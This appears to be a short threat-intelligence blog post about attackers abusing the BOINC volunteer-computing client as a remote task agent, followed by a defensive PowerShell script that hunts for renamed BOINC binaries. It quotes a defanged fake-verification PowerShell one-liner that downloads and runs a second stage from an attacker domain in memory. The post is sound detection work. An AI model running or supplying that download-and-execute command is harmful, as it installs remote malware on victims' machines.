015. Threat Actors Can Abuse Even This Kind of Software

Hello everyone! A recent Unit 42 notification reminded me about a VERY curious piece of legitimate software abused by adversaries. It's BOINC, or Berkeley Open Infrastructure for Network Computing: open-source software that lets users contribute their computing power to scientific research projects that need heavy calculations.

The infection process is interesting as well. The victim is redirected to a malicious website with fake verification checks and is instructed to paste and run a PowerShell script:

powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//lggknhaffleahbh[.]top/1.php?s=527;iex $global:block.content

In Windows PowerShell, curl is an alias for Invoke-WebRequest and -useb abbreviates -UseBasicParsing, so this one-liner downloads a second stage and runs it in memory with Invoke-Expression (iex) without writing it to disk. The downloaded script then installs the BOINC client. Why would an adversary use BOINC? Because the client collects information about the host and fetches tasks from its configured server for execution: point it at a server you control and you have a ready-made task-execution agent on the victim machine!

So, what to look for? Here are a few detection and hunting tips:

  • Look for renamed BOINC executables (the file name no longer matches the stock client binaries)
  • Look for executables with file metadata related to BOINC, for example: "BOINC Client", "boinc.exe", etc.
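As an added example (not from the Unit 42 report or the BOINC project), here's a PowerShell hunting script that puts both tips into practice: it walks common drop directories and the running process list, flags any binary whose PE version metadata mentions BOINC, and marks it as renamed when the on-disk name isn't one of the stock BOINC executables. The directory list and the stock-name list are my assumptions; tune them for your environment.

```powershell
# Added hunting example, not code from the original post. Assumptions: the
# directories below are common drop locations, and $KnownBoincNames lists the
# stock BOINC client binaries; adjust both to your environment.
$ScanRoots       = @($env:ProgramData, $env:LOCALAPPDATA, $env:APPDATA, $env:TEMP)
$KnownBoincNames = @('boinc.exe', 'boincmgr.exe', 'boinccmd.exe', 'boinctray.exe', 'boincscr.exe')
$MetadataFields  = @('FileDescription', 'ProductName', 'OriginalFilename', 'InternalName', 'CompanyName')

# True when any PE version-info string mentions BOINC (-match is case-insensitive).
function Test-BoincMetadata {
    param([System.Diagnostics.FileVersionInfo]$Info)
    if (-not $Info) { return $false }
    foreach ($field in $MetadataFields) {
        if ($Info.$field -and $Info.$field -match 'boinc') { return $true }
    }
    return $false
}

# Emit one finding record for a file whose metadata points at BOINC, nothing otherwise.
# Renamed is the key signal from the tips above; -notcontains is case-insensitive.
function New-BoincFinding {
    param([string]$Path, [string]$Source)
    $item = Get-Item -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $item) { return }
    $vi = $item.VersionInfo
    if (-not (Test-BoincMetadata $vi)) { return }
    [PSCustomObject]@{
        Source           = $Source
        Path             = $item.FullName
        OnDiskName       = $item.Name
        OriginalFilename = $vi.OriginalFilename
        FileDescription  = $vi.FileDescription
        ProductName      = $vi.ProductName
        Renamed          = ($KnownBoincNames -notcontains $item.Name)
        SHA256           = (Get-FileHash -Algorithm SHA256 -LiteralPath $item.FullName).Hash
    }
}

$findings = @(
    # 1) On-disk hunt: every .exe/.dll under the scan roots.
    foreach ($root in $ScanRoots) {
        if (-not $root -or -not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue |
            ForEach-Object { New-BoincFinding -Path $_.FullName -Source 'disk' }
    }

    # 2) Live hunt: image files of running processes. Path is empty for processes
    #    we lack rights to inspect, so run elevated for full coverage.
    Get-Process -ErrorAction SilentlyContinue | Where-Object { $_.Path } |
        ForEach-Object { New-BoincFinding -Path $_.Path -Source "process:$($_.Id)" }
)

# Renamed binaries first: a BOINC client calling itself something else is the
# strongest indicator; a stock boinc.exe in a user profile still deserves a look.
$findings | Sort-Object Renamed -Descending |
    Format-Table Source, Renamed, OnDiskName, OriginalFilename, FileDescription, Path -AutoSize
```

Run it from an elevated PowerShell console. Anything with Renamed = True, or a stock BOINC binary sitting in a user-writable location such as %APPDATA% or %TEMP%, is worth pivoting on: who dropped it, which scheduled task or Run key launches it, and whether the user actually volunteered for a research project.
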

See you tomorrow!
